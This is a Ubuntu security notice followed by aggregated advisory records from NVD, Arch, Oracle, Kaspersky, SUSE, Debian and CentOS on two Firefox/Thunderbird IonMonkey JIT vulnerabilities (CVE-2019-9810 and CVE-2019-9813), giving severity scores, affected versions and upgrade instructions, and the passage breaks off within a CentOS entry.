ID: USN-3919-1
Type: ubuntu
Reporter: Ubuntu
Modified: 2019-03-25T00:00:00
Description
Two security issues were discovered in the JavaScript engine in Firefox.
If a user were tricked into opening a specially crafted website, an
attacker could exploit this to cause a denial of service or execute
arbitrary code.
{"cve": [{"lastseen": "2020-12-09T21:41:58", "description": "Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.", "edition": 14, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-26T17:29:00", "title": "CVE-2019-9810", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9810"], "modified": "2019-05-13T10:29:00", "cpe": [], "id": "CVE-2019-9810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9810", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:58", "description": "Incorrect handling of __proto__ mutations may lead to type confusion in IonMonkey JIT code and can be leveraged for arbitrary memory read and write. 
This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.", "edition": 14, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-26T17:29:00", "title": "CVE-2019-9813", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9813"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-9813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9813", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Arch Linux Security Advisory ASA-201904-4\n=========================================\n\nSeverity: Critical\nDate : 2019-04-06\nCVE-ID : CVE-2019-9810 CVE-2019-9813\nPackage : thunderbird\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-947\n\nSummary\n=======\n\nThe package thunderbird before version 60.6.1-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 60.6.1-1.\n\n# 
pacman -Syu \"thunderbird>=60.6.1-1\"\n\nThe problems have been fixed upstream in version 60.6.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-9810 (arbitrary code execution)\n\nAn incorrect alias information in the IonMonkey JIT compiler of Firefox\nbefore 66.0.1 and Thunderbird before 60.6.1 for the\nArray.prototype.slice method may lead to missing bounds check and a\nbuffer overflow.\n\n- CVE-2019-9813 (arbitrary code execution)\n\nAn incorrect handling of __proto__ mutations may lead to type confusion\nin the IonMonkey JIT code of Firefox before 66.0.1 and Thunderbird\nbefore 60.6.1, and can be leveraged for arbitrary memory read and\nwrite.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9810\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9810\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1537924\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9813\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1538006\nhttps://security.archlinux.org/CVE-2019-9810\nhttps://security.archlinux.org/CVE-2019-9813", "modified": "2019-04-06T00:00:00", "published": "2019-04-06T00:00:00", "id": "ASA-201904-4", "href": "https://security.archlinux.org/ASA-201904-4", "type": "archlinux", "title": "[ASA-201904-4] thunderbird: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Arch Linux Security Advisory ASA-201903-14\n==========================================\n\nSeverity: Critical\nDate : 2019-03-23\nCVE-ID : CVE-2019-9810 CVE-2019-9813\nPackage : firefox\nType : 
arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-930\n\nSummary\n=======\n\nThe package firefox before version 66.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 66.0.1-1.\n\n# pacman -Syu \"firefox>=66.0.1-1\"\n\nThe problems have been fixed upstream in version 66.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-9810 (arbitrary code execution)\n\nAn incorrect alias information in the IonMonkey JIT compiler of Firefox\nbefore 66.0.1 for the Array.prototype.slice method may lead to missing\nbounds check and a buffer overflow.\n\n- CVE-2019-9813 (arbitrary code execution)\n\nAn incorrect handling of __proto__ mutations may lead to type confusion\nin the IonMonkey JIT code of Firefox before 66.0.1 and can be leveraged\nfor arbitrary memory read and write.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9810\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1537924\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1538006\nhttps://security.archlinux.org/CVE-2019-9810\nhttps://security.archlinux.org/CVE-2019-9813", "modified": "2019-03-23T00:00:00", "published": "2019-03-23T00:00:00", "id": "ASA-201903-14", "href": "https://security.archlinux.org/ASA-201903-14", "type": "archlinux", "title": "[ASA-201903-14] firefox: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "[60.6.1-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)", 
"edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0671", "href": "http://linux.oracle.com/errata/ELSA-2019-0671.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "[60.6.1-1.0.1]\n- fix LD_LIBRARY_PATH\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat one\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)", "edition": 3, "modified": "2019-03-27T00:00:00", "published": "2019-03-27T00:00:00", "id": "ELSA-2019-0672", "href": "http://linux.oracle.com/errata/ELSA-2019-0672.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:05", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 3, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0680", "href": "http://linux.oracle.com/errata/ELSA-2019-0680.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-19T21:14:56", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update 
to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 1, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-1144", "href": "http://linux.oracle.com/errata/ELSA-2019-1144.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-19T21:10:56", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.2]\n- Rebuild to pickup Oracle default bookmarks [Orabug: 30069264]\n[60.6.1-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n- Build with ol8 rust/llvm rather than scl\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)\n[60.6.0-3]\n- Added Google API keys (mozbz#1531176)\n[60.6.0-2]\n- Update to 60.6.0 ESR (Build 2)\n[60.6.0-1]\n- Update to 60.6.0 ESR (Build 1)", "edition": 1, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-0966", "href": "http://linux.oracle.com/errata/ELSA-2019-0966.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0681", "href": "http://linux.oracle.com/errata/ELSA-2019-0681.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:55:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/22/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Firefox ESR. Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Firefox ESR earlier than 60.6.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox ESR](<https://www.mozilla.org/en-US/firefox/organizations/all/>)\n\n### *Original advisories*:\n[MFSA2019-10](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox ESR](<https://threats.kaspersky.com/en/product/Mozilla-Firefox-ESR/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-22T00:00:00", "id": "KLA11451", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11451", "title": "\r KLA11451Multiple vulnerabilities in Mozilla Firefox ESR ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/25/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Thunderbird. 
Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Thunderbird earlier than 60.6.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>)\n\n### *Original advisories*:\n[mfsa2019-12](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Thunderbird](<https://threats.kaspersky.com/en/product/Mozilla-Thunderbird/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-25T00:00:00", "id": "KLA11453", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11453", "title": "\r KLA11453Multiple vulnerabilities in Mozilla Thunderbird ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:46:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/22/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Firefox. Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Firefox earlier than 66.0.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[MFSA2019-09](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-22T00:00:00", "id": "KLA11450", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11450", "title": "\r KLA11450Multiple vulnerabilities in Mozilla Firefox ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-04-04T23:13:11", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - update to Mozilla Thunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n Release notes:\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-12</a>\n\n", "edition": 1, "modified": "2019-04-04T21:10:38", "published": "2019-04-04T21:10:38", "id": "OPENSUSE-SU-2019:1152-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00026.html", "title": "Security update for MozillaThunderbird (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2019-03-29T14:53:30", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This update for MozillaFirefox fixes the following issues:\n\n Mozilla Firefox was updated to 60.6.1esr / MFSA 2019-10 (bsc#1130262)\n\n * CVE-2019-9810: IonMonkey MArraySlice has incorrect alias information\n * CVE-2019-9813: Ionmonkey type confusion with __proto__ mutations\n\n Mozilla Firefox was updated to 60.6.0esr / MFSA 2019-08 (boo#1129821)\n\n * CVE-2019-9790: Use-after-free when removing in-use DOM elements\n * CVE-2019-9791: Type inference is incorrect for constructors entered\n through on-stack replacement with IonMonkey\n * CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script\n * CVE-2019-9793: Improper bounds checks when Spectre mitigations are\n disabled\n * CVE-2019-9794: Command line arguments not discarded during execution\n * CVE-2019-9795: Type-confusion in IonMonkey JIT compiler\n * CVE-2019-9796: Use-after-free with SMIL animation controller\n * CVE-2018-18506: Proxy Auto-Configuration file can define localhost\n access to be proxied\n * CVE-2019-9788: Memory safety bugs fixed in Firefox 66 and Firefox ESR\n 60.6\n\n Mozilla Firefox 60.5.2esr also had one change:\n\n * Fix a frequent crash when reading various Reuters news articles.\n\n", "edition": 1, "modified": "2019-03-29T12:20:13", "published": "2019-03-29T12:20:13", "id": "OPENSUSE-SU-2019:1077-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00043.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-27T14:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", 
"CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This update for MozillaFirefox fixes the following issues:\n\n Mozilla Firefox was updated to 60.6.1esr (MFSA 2019-10 boo#1130262)\n\n * CVE-2019-9810: IonMonkey MArraySlice has incorrect alias information\n * CVE-2019-9813: Ionmonkey type confusion with __proto__ mutations\n\n Mozilla Firefox was updated to 60.6.0esr (MFSA 2019-08 boo#1129821)\n\n * CVE-2019-9790: Use-after-free when removing in-use DOM elements\n * CVE-2019-9791: Type inference is incorrect for constructors entered\n through on-stack replacement with IonMonkey\n * CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script\n * CVE-2019-9793: Improper bounds checks when Spectre mitigations are\n disabled\n * CVE-2019-9794: Command line arguments not discarded during execution\n * CVE-2019-9795: Type-confusion in IonMonkey JIT compiler\n * CVE-2019-9796: Use-after-free with SMIL animation controller\n * CVE-2018-18506: Proxy Auto-Configuration file can define localhost\n access to be proxied\n * CVE-2019-9788: Memory safety bugs fixed in Firefox 66 and Firefox ESR\n 60.6\n\n Mozilla Firefox was updated to 60.5.2esr:\n\n * Fix a frequent crash when reading various Reuters news articles\n\n", "edition": 1, "modified": "2019-03-27T12:10:28", "published": "2019-03-27T12:10:28", "id": "OPENSUSE-SU-2019:1056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00035.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-04-03T15:10:04", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9801", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This 
update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - Update to MozillaThunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n - Update to MozillaThunderbird 60.6 (bsc#1129821):\n\n - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file\n - CVE-2019-9801: Fixed an issue which could allow Windows programs to be\n exposed to web content\n - CVE-2019-9788: Fixed multiple memory safety bugs\n - CVE-2019-9790: Fixed a Use-after-free vulnerability when removing in-use\n DOM elements\n - CVE-2019-9791: Fixed an incorrect Type inference for constructors\n entered through on-stack replacement with IonMonkey\n - CVE-2019-9792: Fixed an issue where IonMonkey leaks JS_OPTIMIZED_OUT\n magic value to script\n - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre\n mitigations are disabled\n - CVE-2019-9794: Fixed an issue where command line arguments not discarded\n during execution\n - CVE-2019-9795: Fixed a Type-confusion vulnerability in IonMonkey JIT\n compiler\n - CVE-2019-9796: Fixed a Use-after-free vulnerability in SMIL animation\n controller\n\n Release notes:\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/</a>\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/</a>\n\n", "edition": 1, "modified": "2019-04-03T12:12:14", "published": "2019-04-03T12:12:14", "id": "OPENSUSE-SU-2019:1126-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00023.html", "title": "Security update for MozillaThunderbird (critical)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": 
"2020-08-12T00:57:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "Package : firefox-esr\nVersion : 60.6.1esr-1~deb8u1\nCVE ID : CVE-2019-9810 CVE-2019-9813\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n60.6.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 8, "modified": "2019-03-25T13:12:34", "published": "2019-03-25T13:12:34", "id": "DEBIAN:DLA-1727-1:16406", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201903/msg00029.html", "title": "[SECURITY] [DLA 1727-1] firefox-esr security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-11T01:29:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4417-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 24, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2019-9810 CVE-2019-9813\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 60.6.1esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFor the detailed security status of firefox-esr please refer to\nits security tracker page 
at:\nhttps://security-tracker.debian.org/tracker/firefox-esr\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 20, "modified": "2019-03-24T20:16:07", "published": "2019-03-24T20:16:07", "id": "DEBIAN:DSA-4417-1:DB9AB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00061.html", "title": "[SECURITY] [DSA 4417-1] firefox-esr security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:40:19", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0671\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035295.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2019-04-01T19:07:32", "published": "2019-04-01T19:07:32", "id": "CESA-2019:0671", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035295.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:34:05", "bulletinFamily": "unix", "cvelist": 
["CVE-2019-9813", "CVE-2019-9810"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0672\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information (CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations (CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-April/035293.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 5, "modified": "2019-04-01T19:05:36", "published": "2019-04-01T19:05:36", "id": "CESA-2019:0672", "href": "http://lists.centos.org/pipermail/centos-announce/2019-April/035293.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:38:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2018-18509", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506", "CVE-2018-18356"], "description": "**CentOS Errata and Security Advisory** CESA-2019:0680\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 60.6.1.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 66 and Firefox ESR 60.6 